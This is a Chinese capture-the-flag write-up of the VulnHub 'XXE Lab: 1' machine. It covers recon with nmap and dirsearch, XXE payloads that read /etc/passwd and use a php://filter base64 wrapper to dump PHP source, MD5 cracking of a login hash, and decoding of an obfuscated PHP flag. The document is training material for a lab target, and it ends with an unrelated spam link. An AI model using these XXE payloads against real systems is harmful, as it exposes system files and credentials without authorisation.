一、前言
主要利用方式:通过XXE漏洞,base64加解码读取php源码文件,
获取flag跳转文件地址,在进行base32及base64解码
获取flag编码后,放入php环境中加载读取flag
二、靶机信息
靶场: vulnhub.com
靶机名称: XXE Lab: 1
难度: 简单
发布时间: 2018 年 8月 8日
下载地址:https://www.vulnhub.com/entry/xxe-lab-1,254/
备注:
三、虚拟机配置
Vmware、网络连接模式:NAT模式、DHCP服务:启用、IP地址:自动分配
攻击IP:192.168.169.129
靶机IP:192.168.169.178
四、信息收集
1、探测靶机ip地址
└─$ sudo arp-scan -I eth0 -l
2、探测靶机ip端口及端口具体服务
└─$ sudo nmap -p- 192.168.169.178
└─$ sudo nmap -p80,5335 -sV -A 192.168.169.178
3、访问web网站,及进行常规路径扫描
http://192.168.169.178/
└─$ dirsearch -u 192.168.169.178
4、路径探测
http://192.168.169.178/robots.txt
http://192.168.169.178/xxe/admin.php
5、尝试登录抓包,发现使用了XML进行构建登录请求
6、尝试使用XXE漏洞,成功读取passwd文件
“知识点:PHP伪协议详解”
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<root><name>&admin;</name><password>123456</password></root>
7、尝试读取本地文件,寻找登录密码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php"> ]>
<root><name>&admin;</name><password>123456</password></root>
8、解码base64
在代码中,发现用户名、密码及初步怀疑flag的地址
if ($_POST['username'] == 'administhebest' &&
md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609')
echo "You have entered valid use name and password <br />";
$flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
9、解密MD5,尝试访问flag的地址
E6e061838856bf47e1de730719fb2609 ==》 admin@123
http://192.168.169.178/xxe/flagmeout.php
通过尝试,在xxe/路径下访问flag url才能够正常访问,通过源代码访问得到提示信息
the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5)
10、连续解密,base32==》base64
Base32解密:JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5==》L2V0Yy8uZmxhZy5waHA=
Base64解密:
L2V0Yy8uZmxhZy5waHA= ==》/etc/.flag.php
11、获取地址,回到burp再次使用xxe去读取目标文件,
<!DOCTYPE ANY [
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php"> ]>
JF9bXSsrOyRfW109JF8uXzskX19fX189JF9bKCsrJF9fW10pXVsoKyskX19bXSkrKCsrJF9fW10pKygrKyRfX1tdKV07JF89JF9bJF9bK19dXTskX19fPSRfXz0kX1srKyRfX1tdXTskX19fXz0kXz0kX1srX107JF8rKzskXysrOyRfKys7JF89JF9fX18uKyskX19fLiRfX18uKyskXy4kX18uKyskX19fOyRfXz0kXzskXz0kX19fX187JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskX19fPStfOyRfX18uPSRfXzskX19fPSsrJF9eJF9fX1srX107JMOAPStfOyTDgT0kw4I9JMODPSTDhD0kw4Y9JMOIPSTDiT0kw4o9JMOLPSsrJMOBW107JMOCKys7JMODKys7JMODKys7JMOEKys7JMOEKys7JMOEKys7JMOGKys7JMOGKys7JMOGKys7JMOGKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JF9fKCckXz0iJy4kX19fLiTDgS4kw4IuJMODLiRfX18uJMOBLiTDgC4kw4EuJF9fXy4kw4EuJMOALiTDiC4kX19fLiTDgS4kw4AuJMODLiRfX18uJMOBLiTDgi4kw4MuJF9fXy4kw4EuJMOCLiTDgC4kX19fLiTDgS4kw4kuJMODLiRfX18uJMOBLiTDiS4kw4AuJF9fXy4kw4EuJMOJLiTDgC4kX19fLiTDgS4kw4QuJMOGLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOGLiTDgS4kX19fLiTDgS4kw4guJMODLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOILiTDgy4kX19fLiTDgS4kw4YuJMOJLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOELiTDhi4kX19fLiTDgS4kw4QuJMOBLiRfX18uJMOBLiTDiC4kw4MuJF9fXy4kw4EuJMOJLiTDgS4kX19fLiTDgS4kw4kuJMOGLiciJyk7JF9fKCRfKTsK
获得如下代码:
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);
12、代码保存本地,放置php环境中访问(phpstudy)
开头及结尾添加php的标识符<?php ?>
在phpstdudy 环境下访问,获取flag
Failure evaluating code: SAFCSP{xxe_is_so_easy}
看的我热血沸腾啊https://www.jiwenlaw.com/